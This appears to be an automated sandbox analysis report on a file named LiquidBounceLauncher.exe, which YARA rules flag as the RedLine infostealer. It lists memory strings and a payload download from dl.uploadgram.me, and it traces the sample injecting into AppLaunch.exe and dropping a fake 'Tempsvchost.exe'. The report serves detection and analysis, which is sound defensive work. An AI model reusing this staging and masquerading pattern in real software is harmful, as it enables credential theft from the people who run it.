                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.adob
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://helpx.ad
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/search
                      Source: AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: dl.uploadgram.me
                      Source: global trafficHTTP traffic detected: GET /628a4c7f14fb9g?raw HTTP/1.1Host: dl.uploadgram.meConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 176.9.247.226:443 -> 192.168.2.4:49769 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 4.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.LiquidBounceLauncher.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.LiquidBounceLauncher.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.2.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: LiquidBounceLauncher.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: 4.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.3.LiquidBounceLauncher.exe.7b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.LiquidBounceLauncher.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.LiquidBounceLauncher.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.2.LiquidBounceLauncher.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Tempsvchost.exe_47485259fa2fe91b22eefff99ee659f6163bac7_70cd5a86_1b5f7a5c\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth, description = Detects a crashed application executed in a suspicious directory, reference = https://twitter.com/cyb3rops/status/1185585050059976705, score =
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 652
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0042A0300_2_0042A030
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004490C00_2_004490C0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0045E0C00_2_0045E0C0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0044A0F00_2_0044A0F0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004550B00_2_004550B0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004572700_2_00457270
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004592200_2_00459220
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004502C00_2_004502C0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004192E00_2_004192E0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0044E2A00_2_0044E2A0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0041F2B00_2_0041F2B0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0042C2B00_2_0042C2B0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004423000_2_00442300
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0046C4700_2_0046C470
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004205400_2_00420540
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004215800_2_00421580
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004546D00_2_004546D0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0045D6E00_2_0045D6E0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0046B7400_2_0046B740
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004587500_2_00458750
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0046A7300_2_0046A730
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0044F8100_2_0044F810
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_0045A8100_2_0045A810
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004518F00_2_004518F0
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: 0_2_004459D00_2_004459D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4_2_0707EF684_2_0707EF68
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004EF03E17_2_004EF03E
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0042103017_2_00421030
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004EF15E17_2_004EF15E
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004E117017_2_004E1170
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0046A1E017_2_0046A1E0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0046B1F017_2_0046B1F0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045418017_2_00454180
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045D19017_2_0045D190
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045820017_2_00458200
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0044F2C017_2_0044F2C0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045A2C017_2_0045A2C0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004513A017_2_004513A0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004234E017_2_004234E0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0044548017_2_00445480
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004694B017_2_004694B0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045E54017_2_0045E540
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0042068017_2_00420680
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004466A017_2_004466A0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045B73017_2_0045B730
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004F373917_2_004F3739
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004527C017_2_004527C0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004577F017_2_004577F0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0044779017_2_00447790
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004E887017_2_004E8870
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0044E80017_2_0044E800
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0042081017_2_00420810
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045083017_2_00450830
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00424A7017_2_00424A70
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00429AE017_2_00429AE0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004E8AA217_2_004E8AA2
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00454B6017_2_00454B60
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00448B7017_2_00448B70
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_0045DB7017_2_0045DB70
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00449BA017_2_00449BA0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_00458CD017_2_00458CD0
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: 17_2_004E5CE017_2_004E5CE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0051100020_2_00511000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0051324020_2_00513240
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0054A31920_2_0054A319
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053F45020_2_0053F450
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053F68220_2_0053F682
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053F8DF20_2_0053F8DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053C8C020_2_0053C8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0053A95B20_2_0053A95B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_0054EACD20_2_0054EACD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00545C1E20_2_00545C1E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00537D5020_2_00537D50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 20_2_00545D3E20_2_00545D3E
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeCode function: String function: 0040146E appears 58 times
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: String function: 0043A220 appears 34 times
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: String function: 0040146E appears 44 times
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeCode function: String function: 004A95A0 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: String function: 005411D7 appears 167 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: String function: 00535900 appears 41 times
                      Source: LiquidBounceLauncher.exeBinary or memory string: OriginalFilename vs LiquidBounceLauncher.exe
                      Source: LiquidBounceLauncher.exe, 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWhirrings.exe4 vs LiquidBounceLauncher.exe
                      Source: LiquidBounceLauncher.exe, 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWhirrings.exe4 vs LiquidBounceLauncher.exe
                      Source: LiquidBounceLauncher.exeStatic PE information: invalid certificate
                      Source: LiquidBounceLauncher.exeReversingLabs: Detection: 19%
                      Source: LiquidBounceLauncher.exeStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\LiquidBounceLauncher.exe "C:\Users\user\Desktop\LiquidBounceLauncher.exe"
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\LiquidBounceLauncher.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 652
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Tempsvchost.exe "C:\Users\user\AppData\Local\Tempsvchost.exe"
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Tempsvchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
